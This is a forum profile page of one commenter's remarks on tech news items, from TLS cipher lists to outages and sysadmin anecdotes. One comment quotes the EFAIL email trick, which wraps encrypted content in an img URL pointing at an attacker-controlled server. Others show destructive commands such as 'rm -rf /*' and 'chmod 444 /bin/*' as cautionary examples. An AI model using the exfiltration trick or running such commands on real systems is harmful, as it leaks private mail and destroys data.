* Posts by Alan J. Wylie

645 publicly visible posts • joined 21 Aug 2009

Page:

Git365. Git for Teams. Quatermass and the Git Pit. GitHub simply won't do now Microsoft has it

Alan J. Wylie

Happy birthday, you lumbering MS-DOS-based mess: Windows 98 turns 20 today

Alan J. Wylie

Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.

And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.

UK footie fans furious as Sky Broadband goes TITSUP: Total inability to stream unfair penalties

Alan J. Wylie

Seems to have affected Zen Internet too

Routing & Core Network Loss of Resilience

They seem to have had redundancy and no outage.

One update of interest:

Engineers are continuing to work on the fibre break.

The work is currently being delayed by numerous road works.

It's time for TLS 1.0 and 1.1 to die (die, die)

Alan J. Wylie

Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?

Supported Server Cipher(s):

Preferred TLSv1.0 128 bits AES128-SHA

Accepted TLSv1.0 256 bits AES256-SHA

Accepted TLSv1.0 128 bits RC4-SHA

Accepted TLSv1.0 112 bits DES-CBC3-SHA

Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256

Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256

Accepted TLSv1.0 128 bits RC4-MD5

User spent 20 minutes trying to move mouse cursor, without success

Alan J. Wylie

Sun optical mice, circa 1985

How many here remember the optical mice on early '80s Sun worksations?

Mouse Systems

There was a special mouse pad with horizontal and vertical lines on it.

New York State is trying to ban 'deepfakes' and Hollywood isn't happy

Alan J. Wylie

Re: Bullshit

So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."

And what about Woody Alllen's Zelig and Dead Men Don't Wear Plaid?

Void Linux gave itself to the void, Korora needs a long siesta – life is hard for small distros

Alan J. Wylie

Missing lead developers

The main developer of Void Linux has apparently disappeared.

That reminds me of the problem Centos had quite a few years ago:

CentOS back from brink of death, Disappearing admin reappears

PGP and S/MIME decryptors can leak plaintext from emails, says infosec professor

Alan J. Wylie
Alan J. Wylie

Re: It seems it's a vul'n in HTML parsing in some clients

Martijn Grooten on twitter

The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.

Alan J. Wylie

T-Mobile owner sends in legal heavies to lean on small Brit biz over use of 'trademarked' magenta

Alan J. Wylie

We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.

UK age-checking smut overlord won't be able to handle the pressure – critics

Alan J. Wylie

Re: Lesbian Spank Inferno

$ whois LesbianSpankInferno.co.uk | grep "Registered on:"

Registered on: 23-Apr-2018

US military base stores pull Huawei, ZTE kit off the shelves

Alan J. Wylie

Today's NCSC advice

ZTE: NCSC advice to select telecommunications operators with national security concerns

The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated

GitLab crawling back online after breaking its brain in two

Alan J. Wylie

gitlab vulnerabilities disclosed

I wonder whether the problem was as a result of these vulnerabilities being patched:

https://twitter.com/jobertabma/status/989708798515265539

Jobert Abma, 4:32 am - 27 Apr 2018

In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!

ISO blocks NSA's latest IoT encryption systems amid murky tales of backdoors and bullying

Alan J. Wylie

The ciphers look as if they will remain in the Linux kernel

http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html

Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.

Bruce Schneier's opinion is Personally, I doubt that they're backdoored

TSB outage, day 5: What do you mean you can't log in? Our systems are up and running. Up and running, we say!

Alan J. Wylie

loading failed for script

https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg

"Loading failed for the <script> with the source "https://dpm.demdex.net/"...

"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...

What on earth are these doing on a supposedly secure page?

The tech you're reading these words on – you have two Dundee uni boffins to thank for that

Alan J. Wylie

Re: Spear

Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).

Alan J. Wylie

RSRE and Laser-Scan

RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.

Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays

I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".

Yahoo! fined! $35m! for! covering! up! massive! IT! security! screwup!

Alan J. Wylie

Re: How about fining BT for also failing to disclose the breach.

I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.

Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?

Good news: AI could solve the pension crisis – by triggering a nuclear apocalypse by 2040

Alan J. Wylie

Dr Strangelove.

I wonder who he is referring to in this quote from the movie clip?

"a study of this project by the Bland Corporation".

AWS DNS network hijack turns MyEtherWallet into ThievesEtherWallet

Alan J. Wylie

8.8.8.8

The first reports I saw were of Google's 8.8.8.8 failing to resolve.

Chatter on noc.spamexperts.net, status.aws.amazon.com and /r/sysadmin

Internet Engineering Task Force leaves home, gets own bank account

Alan J. Wylie

“rough consensus and running code”

Also humming

RFC 7282 - On Consensus and Humming in the IETF

Infosec brainiacs release public dataset to classify new malware using AI

Alan J. Wylie

The "evil bit".

“There is no evil bit" is a reference to an April-the-first RFC: 3514

we define a security flag, known as the "evil" bit, in the IPv4 [RFC791] header. Benign packets have this bit set to 0; those that are used for an attack will have the bit set to 1.

Boffins pull off quantum leap in true random number generation

Alan J. Wylie

Re: what about

It's not only got to be genuinely random (as John von Neumann said; "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.

Alan J. Wylie

Re: Sooooo...

187m long parcel of land

Don't bother. A USB connected Geiger–Müller tube will generate randomness just as well.

Imagine you're having a CT scan and malware alters the radiation levels – it's doable

Alan J. Wylie

Re: Assumption is the mother of all fuck-ups:

"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...

As demonstrated by the Ariane 5 Launch Faliure

Alan J. Wylie

Re: Imagine..

Perhaps a CT scanner was a poor example. As someone else has already mentioned, we should remember the Therac-25 tragedy.

Descent of the Machines: Aussie firm boasts of underwater drone swarms

Alan J. Wylie

Re: not just submarines

P.S.

Number of Royal Navy submarines: 10 (3 Trafalgar class, 3 Astute, 4 Vanguard)

Number of Minehunters fitted with Type 2093/2193 Sonar: 13 (6 Hunt, 7 Sandown)

Alan J. Wylie

not just submarines

more or less exclusively focused on detecting submarines

Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on a ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.

Cinema voucher-pusher tells customers: Cancel your credit cards, we've been 'attacked'

Alan J. Wylie

This was public back at the start of February

I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.

http://latest-updates.co.uk/48OZ-6G27-6C2T0OLODC/cr.aspx

Twitter link

Digital air traffic control upgrade puts potential delays on London flights

Alan J. Wylie

Easter Holidays?

Many of my friends are off this week skiing or enjoying Mediterranean sunshine. Is it such a good idea to introduce changes and slow everything down at a peak holiday time?

Britain's 4G is slower than Armenia's

Alan J. Wylie

What's the point of measuring bandwidth

when I can't even make phone calls and send texts when I'm at home in a town in North Yorkshire (pop. 3000)? FTTC is available, though.

Super Cali goes ballistic, Starbucks is on notice: Expensive milky coffee is something quite cancerous

Alan J. Wylie

They'll be coming for our toast and chips next!

Microsoft loves Linux so much it wants someone else to build distros for its Windows Store

Alan J. Wylie

Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish

Alan J. Wylie

Re: Does it have a good terminal emulator ?

Google claims that it runs sshd, so putty might be the answer. Add "screen" too, if that is supported. With a VPN you can get a stable login session from multiple endpoints.

Alan J. Wylie

It has been embraced by developers

In this context, "Embraced" has often been followed by "extended" and "extinguished".

Manchester Arena attack: National Mutual Aid Telephony system failed

Alan J. Wylie

Re: Holy **** you can't make this stuff up.

When was the last time you watched Yes Minister? I think you need a refresher on the subject of "sack civil servant".

I'm sure that there are some penguins on South Georgia that need counting.

How do you make those darn code monkeys do what you want? Just give 'em a little nudge

Alan J. Wylie

You missed out "Can be contracted out to my brother-in-law's company. Good.".

Alan J. Wylie

Beware of the leopard

Make Things Easy / Politicians

The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.

Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.

Confusing instructions on web forms.

Long phone calls on hold with irritating music.

Being referred from one phone number to another.

That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.

Fancy a viaduct? We have a wrought Victorian iron marvel to sell you

Alan J. Wylie

The Great McGonagall

The Tay Bridge Disaster

Almost as bad as the Vogons'.

Beautiful Railway Bridge of the Silv’ry Tay!

Alas! I am very sorry to say

That ninety lives have been taken away

On the last Sabbath day of 1879,

Which will be remember’d for a very long time.

Take that, com-raid: US Treasury slaps financial sanctions on Russians for cyber-shenanigans, 2016 election meddling

Alan J. Wylie

Internet Research Agency

What an unfortunate acronym that makes.

MailChimp 'working' to stop hackers flinging malware-laced spam from accounts

Alan J. Wylie

I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).

List of delivery IPs here: https://mailchimp.com/about/ips/

Bad blood: Theranos CEO charged with massive fraud

Alan J. Wylie

"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."

Magic Leap are you listening?

Privacy folk raise alarm over schools snooping on kids' online habits

Alan J. Wylie

In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.

In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.

Tracking individual children, however, is a different matter.

Developer mistakenly deleted data - so thoroughly nobody could pin it on him!

Alan J. Wylie

Re: Never rm -fr relative links

And be especially cautious about

find -L ... | xargs rm
and absolute links in chroot/container trees.

Alan J. Wylie

Re: Two years ago

$ echo "rm -rf $xxx/*"

rm -rf /*

$ set -o nounset

$ echo "rm -rf $xxx/*"

bash: xxx: unbound variable

$

Alan J. Wylie

That was heroic and ingenious.

My rescue mission to get the system back to normal after someone had typed

chmod 444 /bin/*
involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.

One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.

And for today:

X-Clacks-Overhead: GNU Terry Pratchett

Alan J. Wylie

Two years ago

Valve Steam CLEANS Linux PCs (if you're not careful)

Dodgy shell script triggers classic rm -rf /

rm -rf "$STEAMROOT/"*

But STEAMROOT had not been set

Buffer overflow in Unix mailer Exim imperils 400,000 email servers

Alan J. Wylie

The bug was reported to the Exim team on Monday

The bug was reported to the Exim maintainers on the 5th Febrary, then under an NDA to distros and cloud services. What has just happened is that Mel has released more (but not full) details. There's no public POC either.

There was a bit of a panic when one distro broke the embargo and the patch became public a few days early, on a Friday of all days in the week.

Page: